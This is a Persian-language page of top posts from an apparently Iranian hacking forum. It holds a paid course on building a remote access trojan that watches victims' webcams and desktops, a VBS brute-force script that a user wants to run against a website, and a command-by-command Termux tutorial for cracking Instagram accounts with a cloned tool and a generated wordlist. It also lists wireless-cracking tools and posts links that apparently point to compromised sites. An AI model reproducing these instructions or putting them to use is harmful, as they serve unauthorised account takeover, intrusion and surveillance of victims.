پرچمداران


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان ۱۸/۰۲/۱۷ در همه بخش ها

  1. 12 امتیاز

    نگارش 1.0.0

    17 دریافت

    بسم الله الرحمن الرحیم با سلام پکیج آموزشی کالی لینوکس تماماً توسط تیم گارد ایران تهیه شده و تمامی آموزش ها همراه با مثال برای شما عزیزان ضبط شده. ویدو ها از کیفیت بالا برخوردار هستن و در کنار آموزش کالی لینوکس ، آموزش های دیگری هم قرار داده شده. مثل : آشنایی با دستورات لینوکسی ، برنامه نویسی در کالی لینوکس ، بش نویسی ، ابزارهای مورد نیاز در آموزش ها و... توضیحات: این پکیج بیش از 100 آموزش تصویری همراه با ابزار های مورد نیاز هست که حجم فشرده نشده این پکیج حدود 4 گیگابایت است. حجم فشرده شده و آپلود شده در انجمن 380 مگابایت است. این پکیج در کمترین زمان از شما یک حرفه ای لینوکس میسازه😎

    600٬000 ریال

  2. 11 امتیاز
    با سلام خدمت مدیران و کاربران محترم. چند روز قبل راجب حمله ی بروت فورس با نت پد در آدرس https://www.aparat.com/v/4tqPM/rute_force_با_notepad_و_vbs. ویدیویی را دیدم. میخواستم بدونم این کار امکان پذیره یا نه؟اگه میشه لطفا راهنمایی کنید چون من نفهمیدم ویدیو دقیقا چی میگه. اگه هم نمیشه آموزش بروت فورس رو با Cain بزارید.ممنون. کدی هم که استفاده شده این هست: Set objFSO = CreateObject("scripting.FilesystemObject") Set objFile = objFsO.OpenTextFile("C:\test.txt", For Reading) set wshShe11 = WScript.CreateObject("WScript.She11") wscript.sleep (10000) const For Reading = 1 Dim strPasssword Do Until objFile.AtEndOfstream wshshe11.sendkeys "+{HOME}" wshshe11.sendkeys "lmr.t@t0l" wshshe11.sendkeys "{TAB}" strPassword = obfile.Readline wshshe11.sendkeys strPassword wshshe11.sendkeys "~" wshshe11.sendkeys "{ENTER}" wshshe11.sleep (50) Loop البته بگم که من کد رو خودم از رو ویدیو نوشتم و چون کیفیتش یکم پایین بود شاید درست نباشه . من کد رو در فایلی با فرمت VBS ذخیره کردم که باز نمیشه چون تو این فرمت نباید این جور متن نوشت. من نمیدونم چطور از فایل استفاده کنم که بشه حمله رو انجام داد. لطفا راهنمایی کنید، با تشکر.
  3. 11 امتیاز
  4. 11 امتیاز
    ببخشید دیگه تکرار نمیشه. واقعا ببخشید.
  5. 11 امتیاز
    واقعا کسی نمیدونه؟
  6. 10 امتیاز
    روی سایت میخوام انجام بدم. ولی مثل این که با نت پد نمیشه.
  7. 10 امتیاز
    روی سایت دوست عزیز.
  8. 10 امتیاز
    یعنی کسی نیست؟
  9. 9 امتیاز
    با سلام امروز میخوام در این پست ابزار وایرلسی که یک هکر به آن نیاز داره رو معرفی کنم نکته : سوالات خودتون رو در پستی جدا بگید در حد توان پاسخگو خواهم بود از مدیر بخش میخوام که اگه لازم میدونن پست مهم بشه ۱. Fern WiFi Wireless Cracker یکی از بهترین ابزار هک وایرلس که به صورت رایگان میتونید اون رو دانلود کنید لازم به ذکر هست که این ابزار در کالی به صورت پیشفرض موجود هست دانلود : Download
  10. 9 امتیاز

    نگارش 1.0.0

    16 دریافت

    بسم الله الرحمن الرحیم تیم امنیتی گارد ایران در راستای بالا بردن سطح دانش شما دوستان گرامی اقدام به ساخت پکیج جامع ساخت رت با زبان سی شاپ کرده است که با گزراندن این دوره ارزشمنده دیگر نیازی به رت های آماده ندارید. پس از گزراندن این دوره شما با نحوه کار رت و روش مقابله آن آشنا خواهید شد. این پکیج شامل 13 ویدیو آموزشی میباشد که به جرعت میتوانم بگویم همچین پکیجی در هیچ سایتی وجود ندارد و مختص به گارد ایران میباشد. مدرس : آقای ادریس شریفی سر فصل های آموزشی: معرفی دوره و سخنی با شما آشنایی با مقدمات شبکه آشنایی با رت و ساخت بکدور در متااسپلویت آموزش پورت فورواردینگ به نحوه درست و رفع مشکلات عدم باز شدن پورت آشنایی با سوکت و نحوه استفاده از اون چت کردن با قربانی و ارسال پیغام هشدار آپلود و دانلود فایل از سیستم قربانی دیدن وبکم قربانی به طور زنده دیدن دسکتاپ قربانی به طور زنده اجرای دستورات ریموت شل و آشنایی با نکات مهم و کاربردی در ساخت رت و.... قابل توجه خریداران و اعضای تیم : اگر به خوبی از این پکیج استقبال بشود ورژن 2 نیز ساخته خواهد شد که در آن نکات بسیار حرفه ای تر را خواهیم گفت .

    300٬000 ریال

  11. 8 امتیاز
    با سلام امروز با اموزش کرک اینستاگرام با ترموکس(termux) در خدمت شما هستم... ترموکس یک ابزار اندرویده که میتونید اون رو از گوگل پلی دانلود کنید(نیازمند اندروید5+) خب بریم سراغ آموزش اول باید وارد برنامه ترموکس شیم و با دستورات زیر ابزار هارو اپدیت کنیم apt update apt upgrade یادتون باشه هرجا [n/y] اومد y رو بزنید و بعد اینتر بزنید تا دانلود و نصب کامل شه حالابا دستورات زیر ابزار های مورد نیاز رو دان میکنیم pkg install git pkg install python pip install requests pip install wordlist یادتون باشه یکی یکی باید بزنید خب حالا با دستور git اکسپلویت کرک اینستارو دان میکنیم به اینصورت git clone https://github.com/avramit/instahack.git دوستان هیچ چیزیو جا نزارید حالا یه (ls (LSبزنید ببینید اکسپلویت دان شده یا نه اگه نشده بدونید یجاییو اشتباه زدید خب حالا با دستور cd وارد پوشه اینستا هک میشیم به این صورت cd instahack حالا ls میزنیم حالا باید فایل pass.txt رو حذف کنیم و یه پسورد لیست جدید بسازیم برای حذف فایل از دستور زیر استفاده میکنیم rm -f pass.txt حالا ls بزنید میبینید فایل حذف شده حالا با دستور زیر یه پسورد لیست میسازیم wordlist -m 4 -M 6 -o pass.txt -v 123456 حالا کار تمومه کافیه بزنید python hackinsta.py بعد یوزنیم طرف رو بزنید بعد n رو بزنید و بعد 1 رو بزنید شروع به کرک میکنه موفق باشید
  12. 8 امتیاز
    راستی من یک اشکال امنیتی در سایت شما پیدا کردم. نمی دونستم باید کجا بگم بخاطر همین در بخش سوال و جواب در این جا گفتم. لطفا اکانتم رو بن نکنید آخه نمی دونستم کجا باید می گفتم.
  13. 8 امتیاز
    اسکریپت راهنما و کنترل سرویس Tor . مخصوص ویندوز . امکانات : راهنمای استفاده و نصب تور - کنترل و تنظیم شبکه تور - نمایش مشخصات پروسه تور در ویندوز (نام و session و pid و مقدار مصرف مموری ) - اجرا به عنوان nt-service - تنظیم و اجرای پورت ها و هاست ها هم به صورت اتوماتیک هم دستی) - نمایش پروسه و اطلاعات تکمیلی اتصال های تور . دستور زیر را در محیط command prompt وارد کنید: TorProject --help یا TorProject -h اتصال با مقادیر پیش فرض : TorProject نمایش ورژن تور : TorProject --version اطلاعات پروسه تور : TorProject --info قطع اتصال و بستن تور : TorProject --kill اتصال با مقادیر کاربر و به صورت دستی: TorProject -cp 9151 -sp 9150 --nt-service --host 127.0.0.1
  14. 8 امتیاز
    https://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=39
  15. 8 امتیاز
    سلام با آموزش تست نفوذ به شبکه وایرلس با استفاده از سیستم عامل کالی لینوکس در خدمت شما هستیم. ابزار استفاده شده در فیلم: https://github.com/esc0rtd3w/wifi-hacker.git پسورد فایل زیپ: guardiran.org pentest wireless with kali.zip
  16. 8 امتیاز
    به طور کلی هنگامی که ما میخواهیم یک متن خاص را جستجو کنیم، مرورگر مورد علاقه خود را باز می کنیم، به موتور جستجوی وب می رویم و برخی از کلمات مربوط به آن را تایپ می کنیم. بسته به اینکه چگونه جستجو را انجام می دهیم، نتایج بیشتری را به دست می آوریم با جستجوگرها کارهای خیلی مفیدی میتوان انجام داد و خیلی زیاد مطلب اموزشی میتوان قرار داد. در این متن نسبتا کوتاه قست دارم از کاربرد جستوگرها برای نفوذگرها و نحوه ی استفاده آنها برای گرفتن اطلاعات مورد نیاز مطالبی رو خدمت شما کاربران گاردایران ارایه دهم , وقتی که صحبت از جستجوگر و نفوذ کنار هم میان ذهن اکثر شما عزیزان به سمت Google Hacking و استفاده از Dork ها جهت شناسایی اسیب پذیریها میرود, اما همه جیز در اینجا خلاصه نمیشود. بعد از توضیحاتی کوتاه راجع به جستجوگرها چند جستجوگر که بسیار زیاد برای نفوذگرها قابل اهمیت و پرکاربرد هستند را معرفی خواهم کرد .جستجوگرها بر این اساس دسته بندی میشوند : Crawler based search engines Human powered directories Hybrid search engines Other special search engines Crawler based search engines همه موتورهای جستجوی مبتنی بر خزنده از یک خزنده عنکبوت برای خزیدن و نمایه سازی محتوای جدید به پایگاه داده جستجو استفاده می کنند, هر موتور جستجوگر مبتنی بر خزنده 4 مرحله را برای جستجو دنبال میکنند. Crawling Indexing Calculating Relevancy Retrieving the Result واژه Crawling رو شما در تمام ابزارهای تست نفوذ و اسکنر های وب مشاهده کردید , spider تمام محتوای تک تک پیج ها و لینک های درون صفحات را شناسایی میکند و فهرست میکند سپس کاربران از میان این اطلاعات ذخیره شده، آنچه را که می‌خواهند جستجو می‌کنند. اگر شما در صفحه وب خود تغییراتی را اعمال نمایید، موتورهای جستجوی پیمایشی آنها را به طور خودکار می‌یابند و سپس این تغییرات در فهرست ها اعمال میکنند. Human powered directories این نوع وابسته به کاربرانی است که آن را تکمیل می‌کنند, کاربر صفحه مورد نظر را به همراه توضیحی کوتاه در فهرست ثبت می‌کند یا این کار توسط ویراستارهایی که برای آن فهرست در نظر گرفته شده، انجام می‌شود. عمل جستجو در این حالت تنها بر روی توضیحات ثبت شده صورت می‌گیرد و در صورت تغییر روی صفحه وب، روی فهرست تغییری به وجود نخواهد آورد. Hybrid search engines موتورهای جستجو ترکیبی از هر دو فهرست خزنده و دستی برای فهرست سایت ها در نتایج جستجو استفاده می کنند. بیشتر موتورهای جستجوگر مبتنی بر خزنده مانند گوگل اساسا از خزنده ها به عنوان مکانیسم اولیه و Human powered به عنوان مکانیسم ثانویه استفاده می کنند, موتورهای جستجو بیشتر این روزها به یک مدل مبتنی بر ترکیبی حرکت می کنند. خیلی کوتاه توضیح دادم توضیحات جامع تری در این باره در فضای مجازی مطالعه کنید. 5 جستجوگر مطرح مخصوص هکرها : #1 SHODAN #2 censys #3 ZOOMEYE #4 IVRE #5 PUNKSPIDER به زودی آموزش های تصویری استفاده از این جستجوگرها در انجمن قرار خواهد گرفت با ما همراه باشید. امیدوارم این مقاله مفید واقع شده باشد. موفق و سربلند باشید . تیم امنیتی گارد ایران.
  17. 8 امتیاز
    ۳. KisMAC KisMAC برای Mac OSX و Kismet برای Linux به دانشی پیشرفته نیاز دارند اما از طریق brute force به شکستن کلیدهای WEP و WPA و سوء‌استفاده از آسیب‌پذیری‌های حاصل از scheduling ضعیف و کلیدهایی که به شکلی نامناسب ایجاد شده‌اند کمک می‌کند. دانلود : Download Kismet دانلود : Download
  18. 8 امتیاز
    ۲. inSSIDer یکی از بهترین ابزار بهینه سازی عملکرد شبکه های بی سیم این نرم افزار هم میتونید به صورت رایگان دانلود کنید دانلود : Download
  19. 7 امتیاز
    جدیدترین Bundle نرم افزار اجرا کننده شبکه تور Tor Network برای ویندوز . رمز : guardiran.org فایل نصبی حدود 52 مگابایت حجم دارد با توجه به محدودیت حجم آپلود در انجمن ادامه پارت ها در پست های بعدی قرار میگیرد.(11 پارت) هر گونه سوال درباره اجرای نحوه اجرا و استفاده از شبکه تور تو ویندوز داشتید در بخش سوال و جواب های عمومی بپرسید. [guardiran.org]tor-browser.part01.rar [guardiran.org]tor-browser.part02.rar [guardiran.org]tor-browser.part03.rar
  20. 7 امتیاز
    ورژن جدید اسکریپت TorRunner v1.0.1 | بدون فیلتر شکن از اینترنت استفاده کنید ! فوروارد ساکس ورژن 5 Socks به یک آدرس پروکسی با ساپورت HTTP با استفاده از دستور زیر : TorRunner -pt 127.0.0.2:4545 یا TorRunner --proxy-tunnel 127.0.0.2:4545 یا TorRunner -pt 4545 با اضافه شدن این آپشن به راحتی میتونید تو تنظیمات پروکسی سیستم یا تنظیمات پروکسی مرورگر دلخواهتون آدرس پروکسی رو وارد کرده و بدون فیلتر شکن از اینترنت استفاده کنید.
  21. 7 امتیاز
    پارت های 4 تا 7. [guardiran.org]tor-browser.part04.rar [guardiran.org]tor-browser.part05.rar [guardiran.org]tor-browser.part06.rar [guardiran.org]tor-browser.part07.rar
  22. 7 امتیاز
    http://www.koppensteiner.co.at/images/news/bb.php ارسالی Mr. Moein
  23. 7 امتیاز
    ۴. Metasploit این ابزار نیاز به توضیح نداره همه میشناسن دیگه یک نرم‌افزار قوی برای نفوذ به سیستم‌های دیگر است. این نرم‌افزار امکان دسترسی به شل قربانی را به راحتی حتی بر روی ویندوز ۷ فراهم می‌کند. دانلود : Download
  24. 7 امتیاز
  25. 7 امتیاز